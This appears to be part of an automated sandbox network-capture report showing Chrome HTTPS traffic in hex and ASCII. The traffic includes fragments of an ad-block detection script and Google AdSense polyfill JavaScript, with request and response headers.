                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 69 2c 61 2c 63 3b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 74 72 79 73 2e 70 75 73 68 28 5b 30 2c 33 2c 2c 34 5d 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 3d 77 69 6e 64 6f 77 2e 5f 5f 62 74 7c 7c 7b 7d 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 5f 5f 62 74 2e 63 75 73 74 6f 6d 44 65 74 65 63 74 41 64 42 6c 6f 63 6b 3f 5b 33 2c 32 5d 3a 5b 34 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 2e 63 75 73 74 6f 6d 44 65 74 65 63 74 41 64 42 6c 6f 63 6b 28 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 5b 32 2c 6e 2e 73 65 6e 74
                                                                          Data Ascii: id 0,(function(){var e,t,i,a,c;return n(this,(function(n){switch(n.label){case 0:return n.trys.push([0,3,,4]),window.__bt=window.__bt||{},"function"!=typeof window.__bt.customDetectAdBlock?[3,2]:[4,window.__bt.customDetectAdBlock()];case 1:return[2,n.sent
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 76 61 72 20 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 3b 74 72 79 7b 69 66 28 74 6f 70 2e 64 6f 63 75 6d 65 6e 74 29 72 65 74 75 72 6e 20 74 6f 70 7d 63 61 74 63 68 28 65 29 7b 7d 74 72 79 7b 66 6f 72 28 3b 65 2e 70 61 72 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 3b 29 65 3d 65 2e 70 61 72 65 6e 74 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 65 7d 28 29 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 22 22 21 3d 3d 64 6f
                                                                          Data Ascii: }))}function l(e){(window.document.body||window.document.documentElement).removeChild(e)}var u=function(){var e=window;try{if(top.document)return top}catch(e){}try{for(;e.parent.document;)e=e.parent}catch(e){}return e}();var d=function(){try{return""!==do
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 3a 22 22 2c 20 22 76 69 65 77 22 3a 22 22 2c 20 22 73 69 6e 67 6c 65 5f 63 6c 69 63 6b 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 70 61 67 65 5f 76 69 65 77 73 5f 74 6f 5f 72 65 6e 64 65 72 22 3a 22 30 22 2c 20 22 70 72 65 6d 69 75 6d 5f 62 79 70 61 73 73 5f 6d 6f 64 65 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 68 61 72 64 5f 6d 65 73 73 61 67 65 5f 77 61 6c 6c 5f 6d 6f 64 65 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 20 22 61 6c 6c 6f 77 5f 72 65 6e 64 65 72 5f 74 6f 5f 61 61 5f 75 73 65 72 73 22 3a 66 61 6c 73 65 2c 20 22 63 74 61 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 22 3a 22 22 2c 20 22 66 6f 6e 74 5f 74 79 70 65 22 3a 22 22 2c 20 22 72 65 6e 64 65 72 5f 69 6e 74 65 72 76 61 6c 5f 64 61 79 73 22 3a 30 2c 20 22 63 6f 75 6e
                                                                          Data Ascii: :"", "view":"", "single_click_enabled":false, "page_views_to_render":"0", "premium_bypass_mode_enabled":false, "hard_message_wall_mode_enabled":false, "allow_render_to_aa_users":false, "cta_button_color":"", "font_type":"", "render_interval_days":0, "coun
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 61 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 30 39 35 30 32 37 32 31 30 37 31 35 31 33 36 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 64 6f 67 6c 69 6e 6b 73 2e 63 6f 6d 22 3a 7b 22 63 65 22 3a 66 61 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 32 30 34 38 36 31 31 33 34 33 30 37 33 32 38 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 66 6f 6f 74 62 61 6c 6c 74 69 63 6b 65 74 2e 6e 65 74 22 3a 7b 22 63 65 22 3a 66 61 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 31 38 38 36 39 33 36 32 37 35 30 32 35 39 32 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 6e 79 65 64 61 2e 63 6f 6d
                                                                          Data Ascii: alse,"me":false,"w":"5095027210715136","widget":false,"a":false},"doglinks.com":{"ce":false,"me":false,"w":"5204861134307328","widget":false,"a":false},"footballticket.net":{"ce":false,"me":false,"w":"5188693627502592","widget":false,"a":false},"nyeda.com
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 73 69 64 22 2c 44 29 29 3b 76 61 72 20 54 3d 7b 74 72 61 63 65 49 44 3a 52 2c 73 65 73 73 69 6f 6e 49 44 3a 44 7d 3b 76 61 72 20 56 2c 50 2c 6b 2c 78 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 73 2c 72 2c 69 2c 6f 2c 61 2c 63 2c 6c 2c 64 3b 72 65 74 75 72 6e 20 74 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 70 2c 67 2c 76 2c 6d 2c 66 2c 77 2c 43 2c 4c 2c 52 2c 44 2c 56 2c 50 2c 6b 2c 78 3b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 69 66 28 74 3d 7b 77 65 62 73 69 74 65 49 44 3a 76 6f 69 64 20 30 2c 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3a 21 31 2c 6d 6f 62 69
                                                                          Data Ascii: sid",D));var T={traceID:R,sessionID:D};var V,P,k,x,N=function(){var e,s,r,i,o,a,c,l,d;return t(this,void 0,void 0,(function(){var t,p,g,v,m,f,w,C,L,R,D,V,P,k,x;return n(this,(function(n){switch(n.label){case 0:if(t={websiteID:void 0,contentEnabled:!1,mobi
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 65 3d 77 2e 74 61 67 44 61 74 61 2e 77 69 64 67 65 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 26 26 65 2c 5b 32 2c 7b 73 69 74 65 49 6e 66 6f 3a 74 2c 62 75 6e 64 6c 65 44 61 74 61 3a 77 2e 62 75 6e 64 6c 65 44 61 74 61 2c 72 6c 53 65 74 74 69 6e 67 73 3a 77 2e 6d 65 73 73 61 67 65 57 61 6c 6c 2c 63 68 65 63 6b 73 75 6d 3a 77 2e 63 68 65 63 6b 73 75 6d 7d 5d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6e 2e 73 65 6e 74 28 29 2c 5b 33 2c 35 5d 3b 63 61 73 65 20 35 3a 69 66 28 67 26 26 67 20 69 6e 20 41 29 4c 3d 41 5b 67 5d 2c 74 2e 77 65 62 73 69 74 65 49 44 3d 6e 75 6c 6c 21 3d 3d 28 73 3d 4c 2e 77 29 26 26 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 4c 2e 77 65 62 73 69 74 65 5f 69 64 2c 74 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6e 75 6c 6c 21 3d 3d
                                                                          Data Ascii: e=w.tagData.widget)&&void 0!==e&&e,[2,{siteInfo:t,bundleData:w.bundleData,rlSettings:w.messageWall,checksum:w.checksum}];case 4:return n.sent(),[3,5];case 5:if(g&&g in A)L=A[g],t.websiteID=null!==(s=L.w)&&void 0!==s?s:L.website_id,t.contentEnabled=null!==
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 69 6f 6e 28 29 7b 6e 28 72 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 7d 2c 72 2e 73 65 6e 64 28 74 29 7d 29 29 7d 28 22 68 74 74 70 73 3a 2f 2f 22 2b 53 2b 22 2f 65 76 65 6e 74 73 2f 75 6e 6b 6e 6f 77 6e 5f 64 6f 6d 61 69 6e 73 3f 75 70 61 70 69 3d 74 72 75 65 26 74 69 64 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 54 2e 74 72 61 63 65 49 44 29 2b 22 26 63 76 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 49 29 2c 56 29 7d 72 65 74 75 72 6e 5b 32 2c 7b 73 69 74 65 49 6e 66 6f 3a 74 7d 5d 7d 7d 29 29 7d 29 29 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 4e 7d 4e 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44
                                                                          Data Ascii: ion(){n(r.responseText)},r.send(t)}))}("https://"+S+"/events/unknown_domains?upapi=true&tid="+encodeURIComponent(T.traceID)+"&cv="+encodeURIComponent(I),V)}return[2,{siteInfo:t}]}}))}))}();function U(){return N}N.then((function(e){window.__bt_tag_d={orgID
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 39 22 2c 36 31 5d 2c 5b 22 2d 22 2c 36 32 5d 2c 5b 22 5f 22 2c 36 33 5d 5d 29 3b 73 74 61 74 69 63 20 42 41 53 49 53 3d 36 3b 73 74 61 74 69 63 20 4c 43 4d 3d 32 34 3b 73 74 61 74 69 63 20 65 6e 63 6f 64 65 28 65 29 7b 69 66 28 21 2f 5e 5b 30 2d 31 5d 2b 24 2f 2e 74 65 73 74 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 4d 28 22 49 6e 76 61 6c 69 64 20 62 69 74 46 69 65 6c 64 22 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 6c 65 6e 67 74 68 25 74 68 69 73 2e 4c 43 4d 3b 65 2b 3d 74 3f 22 30 22 2e 72 65 70 65 61 74 28 74 68 69 73 2e 4c 43 4d 2d 74 29 3a 22 22 3b 6c 65 74 20 6e 3d 22 22 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 3d 74 68 69 73 2e 42 41 53 49 53 29 6e 2b 3d 74 68 69 73 2e 44 49 43 54 5b 70 61 72 73 65 49 6e 74 28 65 2e
                                                                          Data Ascii: 9",61],["-",62],["_",63]]);static BASIS=6;static LCM=24;static encode(e){if(!/^[0-1]+$/.test(e))throw new M("Invalid bitField");const t=e.length%this.LCM;e+=t?"0".repeat(this.LCM-t):"";let n="";for(let t=0;t<e.length;t+=this.BASIS)n+=this.DICT[parseInt(e.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.553753142.250.186.684434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:18 UTC474OUTGET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1
                                                                          Host: www.google.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC845INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui"
                                                                          Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
                                                                          Content-Length: 153696
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          ETag: "13124766774017435736"
                                                                          X-Content-Type-Options: nosniff
                                                                          Link: <https://syndicatedsearch.goog>; rel="preconnect"
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:18 UTC545INData Raw: 69 66 28 21 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 29 7b 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 3d 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 41 6c 74 4c 6f 61 64 65 72 3d 33 3b 76 61 72 20 73 66 66 65 44 61 74 61 5f 3d 7b 73 65 72 76 69 63 65 5f 68 6f 73 74 3a 22 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 68 61 73 68 3a 22 31 32 30 30 30 38 36 37 35 38 31 34 38 36 32 32 33 32 35 35 22 2c 70 61 63 6b 61 67 65 73 3a 22 64 6f 6d 61 69 6e 73 22 2c 6d 6f 64 75 6c 65 3a 22 61 64 73 22 2c 76 65 72 73 69 6f 6e 3a 22 31 22 2c 6d 3a 7b 63 65 69 3a 22 31 37 33 30 31 34 33 37 2c 31 37 33 30 31 34 33 39 2c 31 37 33
                                                                          Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,173
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6f 6d 61 69 6e 22 3a 74 72 75 65 2c 22 5f 77 61 69 74 4f 6e 43 6f 6e 73 65 6e 74 46 6f 72 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 45 6e 68 61 6e 63 65 64 54 61 72 67 65 74 69 6e 67 52 73 6f 6e 63 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 4e 6f 6e 62 6c 6f 63 6b 69 6e 67 53 61 73 43 6f 6f 6b 69 65 22 3a 74 72 75 65 7d 2c 6d 64 70 3a 31 38 30 30 30 30 30 2c 73 73 64 6c 3a 22 59 58 42 77 63 33 42 76 64 43 35 6a 62 32 30 73 59 6d 78 76 5a 33 4e 77 62 33 51 75 59 32 39 74 4c 47 4a 79 4c 6d 4e 76 62 53 78 6a 62 79 35 6a 62 32 30 73 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 73 5a 58 55 75 59 32 39 74 4c 47 68 76 63 48 52 76 4c 6d 39 79 5a 79 78 70 62 69 35 75 5a 58 51 73 64 48 4a 68 62 6e 4e 73 59
                                                                          Data Ascii: omain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsY
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 45 39 3e 3e 3e 30 29 2b 22 5f 22 2c 65 3d 30 3b 72 65 74 75 72 6e 20 62 7d 29 3b 0a 71 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 61 3d 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72
                                                                          Data Ascii: mp_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});q("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Arr
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 69 66 28 63 21 3d 22 70 72 6f 74 6f 74 79 70 65 22 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 62 2c 63 29 3b 64 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 63 2c 64 29 7d 65 6c 73 65 20 61 5b 63 5d 3d 62 5b 63 5d 3b 61 2e 70 67 3d 62 2e 70 72 6f 74 6f 74 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 72 65 74 75 72 6e 20 62 7d 0a 71 28 22
                                                                          Data Ascii: if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.pg=b.prototype}function qa(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[c];return b}q("
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 67 67 28 68 2c 67 29 3a 74 68 69 73 2e 4a 64 28 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 59 63 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 32 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 64 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 31 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 65 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 69 66 28 74 68 69 73 2e 42 21 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 73 65 74 74 6c 65 28 22 2b 67 2b 22 2c 20 22 2b 68 2b 22 29 3a 20 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 73 65 74 74 6c 65 64 20 69 6e 20 73 74 61 74 65 22 2b 74 68 69 73 2e 42 29 3b 74 68 69 73 2e 42 3d 67 3b
                                                                          Data Ascii: =="function"?this.gg(h,g):this.Jd(g)};b.prototype.Yc=function(g){this.ae(2,g)};b.prototype.Jd=function(g){this.ae(1,g)};b.prototype.ae=function(g,h){if(this.B!=0)throw Error("Cannot settle("+g+", "+h+"): Promise already settled in state"+this.B);this.B=g;
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 2c 0a 68 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 73 77 69 74 63 68 28 6c 2e 42 29 7b 63 61 73 65 20 31 3a 67 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 68 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 42 29 3b 7d 7d 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 7a 61 3d 3d 6e 75 6c 6c 3f 66 2e 75 64 28 6b 29 3a 74 68 69 73 2e 7a 61 2e 70 75 73 68 28 6b 29 3b 74 68 69 73 2e 4d 64 3d 21 30 7d 3b 62 2e 72 65 73 6f 6c 76 65 3d 64 3b 62 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 6b 28 67 29 7d 29 7d 3b 62 2e 72 61 63 65
                                                                          Data Ascii: ,h){function k(){switch(l.B){case 1:g(l.Ua);break;case 2:h(l.Ua);break;default:throw Error("Unexpected state: "+l.B);}}var l=this;this.za==null?f.ud(k):this.za.push(k);this.Md=!0};b.resolve=d;b.reject=function(g){return new b(function(h,k){k(g)})};b.race
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 65 3d 62 2e 6c 65 6e 67 74 68 3b 65 3e 30 26 26 63 3e 30 3b 29 69 66 28 64 5b 2d 2d 63 5d 21 3d 62 5b 2d 2d 65 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 65 3c 3d 30 7d 7d 29 3b 0a 71 28 22 57 65 61 6b 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 6b 29 7b 74 68 69 73 2e 4b 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6b 29 7b 6b 3d 75 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 64 28 6b 29 7b 76 61 72 20 6c 3d 74 79 70 65 6f
                                                                          Data Ascii: e=b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});q("WeakMap",function(a){function b(k){this.Ka=(h+=Math.random()+1).toString();if(k){k=u(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}}function c(){}function d(k){var l=typeo
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6c 3d 6c 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6c 29 7d 3b 6c 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 6b 26 26 74 79 70 65 6f 66 20 6b 3b 6c 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 66 2e 68 61 73 28 6b 29 3f 6c 3d 66 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 67 2c 66 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6e 3d 68 5b 30 5d 5b 6c 5d 3b 69 66 28 6e 26 26 72 61 28 68 5b 30 5d 2c 6c 29 29 66 6f 72 28 68 3d 30 3b 68 3c 6e 2e 6c 65 6e 67 74 68 3b 68 2b 2b 29 7b 76 61 72 20 70 3d 6e 5b 68 5d 3b 69 66 28 6b 21 3d 3d 6b
                                                                          Data Ascii: l=l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;l=="object"||l=="function"?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var n=h[0][l];if(n&&ra(h[0],l))for(h=0;h<n.length;h++){var p=n[h];if(k!==k
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 58 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 68 29 2e 49 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 28 68 3d 64 28 74 68 69 73 2c 68 29 2e 49 29 26 26 68 2e 76 61 6c 75 65 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 5b 68 2e 6b 65 79 2c 68 2e 76 61 6c 75 65 5d 7d 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65
                                                                          Data Ascii: n(){this[0]={};this[1]=this[1].X=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).I};e.prototype.get=function(h){return(h=d(this,h).I)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.value]})};e.prototype.ke
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 71 28 22 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3b 66 6f 72 28 64 20 69 6e 20 62 29 72 61 28 62 2c 64 29 26 26 63 2e
                                                                          Data Ascii: turn a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});q("Object.values",function(a){return a?a:function(b){var c=[],d;for(d in b)ra(b,d)&&c.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
